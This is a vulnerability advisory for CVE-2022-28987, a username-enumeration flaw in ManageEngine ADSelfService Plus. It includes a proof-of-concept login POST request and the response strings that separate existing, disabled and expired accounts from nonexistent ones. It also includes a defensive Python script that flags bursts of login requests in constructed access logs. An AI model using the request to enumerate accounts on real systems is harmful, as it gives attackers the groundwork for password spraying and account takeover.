
Zoho ManageEngine ADSelfService Plus 6121 Username Enumeration CVE-2022-28987

  • Version: 6.1 Build 6121
  • Tested against: ADSelfService 6118 - 6121

Domain usernames (sAMAccountName) can be enumerated through the application: the login endpoint returns a different response depending on whether the supplied username exists, is enrolled in ADSelfService Plus, is disabled, or has expired.

The vulnerability is triggered by sending the following POST request:

PoC HTTP Request:

POST /ServletAPI/accounts/login HTTP/1.1
Host: target
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 23
DNT: 1
Connection: close
Sec-GPC: 1

loginName=USERNAME

Administrator, krbtgt and Guest are default accounts in Active Directory; the krbtgt and Guest accounts are disabled by default.

  • If the user does not exist, the response is "eSTATUS":"Permission Denied. Kindly contact your Administrator."
  • If the user exists, the response is "LOGIN_STATUS":"PASSWORD","WELCOME_NAME":"{Username}"
  • If the user is disabled (for example Guest or krbtgt), the response is "eSTATUS":"Your account has been disabled. Please see your system administrator."
  • If the user's account has expired, the response is "eSTATUS":"Your account has expired. Please see your system administrator."
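Because the response differences above cannot be removed without a vendor fix, the practical defender-side control is to spot the traffic pattern enumeration produces: one POST to /ServletAPI/accounts/login per candidate username, from one client, in quick succession. The script below is an added example written for this README, not code from the advisory or from Zoho. It assumes the web server or reverse proxy in front of ADSelfService Plus writes combined-format access logs; the log lines it scans are constructed inline, and the threshold and window values are illustrative.

```python
"""
Flag source IPs that burst POSTs at the ADSelfService Plus login endpoint,
the access-log footprint of username enumeration via CVE-2022-28987.

Added example for this advisory. Log lines are constructed, not captured
from a real deployment; the log format is an assumption (combined format
as written by Apache/nginx/Tomcat access logging).
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Endpoint named in the advisory's PoC request.
LOGIN_PATH = "/ServletAPI/accounts/login"

# Combined log format: ip ident user [ts] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return (ip, timestamp, method, path), or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return m["ip"], datetime.strptime(m["ts"], TS_FMT), m["method"], m["path"]


def login_bursts(lines, threshold=20, window=timedelta(minutes=1)):
    """Peak number of login POSTs per source IP inside a sliding time window.

    Returns {ip: peak} for every IP whose peak reaches `threshold`. A user
    retrying a password produces a handful of requests; an enumeration sweep
    produces one request per candidate username, so the peak climbs fast.
    """
    hits = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue  # skip unparseable lines rather than abort the scan
        ip, ts, method, path = parsed
        if method == "POST" and path == LOGIN_PATH:
            hits[ip].append(ts)

    flagged = {}
    for ip, stamps in hits.items():
        stamps.sort()
        peak, start = 0, 0
        for end, ts in enumerate(stamps):
            # Slide the window start forward until it is within `window` of ts.
            while ts - stamps[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged


def _build_sample_log():
    """Constructed traffic: one scanning client, one ordinary user, one GET."""
    base = datetime(2022, 5, 10, 9, 0, 0, tzinfo=timezone.utc)

    def entry(ip, offset_s, method="POST", path=LOGIN_PATH):
        ts = (base + timedelta(seconds=offset_s)).strftime(TS_FMT)
        return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" 200 91'

    lines = [entry("203.0.113.7", 2 * i) for i in range(25)]   # 25 POSTs in 48 s
    lines.append(entry("203.0.113.7", 50, method="GET", path="/"))
    lines += [entry("198.51.100.5", t) for t in (0, 30, 600)]  # normal retries
    return lines


SAMPLE_LOG = _build_sample_log()

if __name__ == "__main__":
    for ip, peak in login_bursts(SAMPLE_LOG).items():
        print(f"possible username enumeration from {ip}: {peak} login POSTs/min")
```

Feed the function real access-log lines one file at a time; the threshold should sit above the busiest legitimate client you observe over a week, since the legitimate pattern is a few retries per user, not dozens of distinct attempts per minute from one address.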
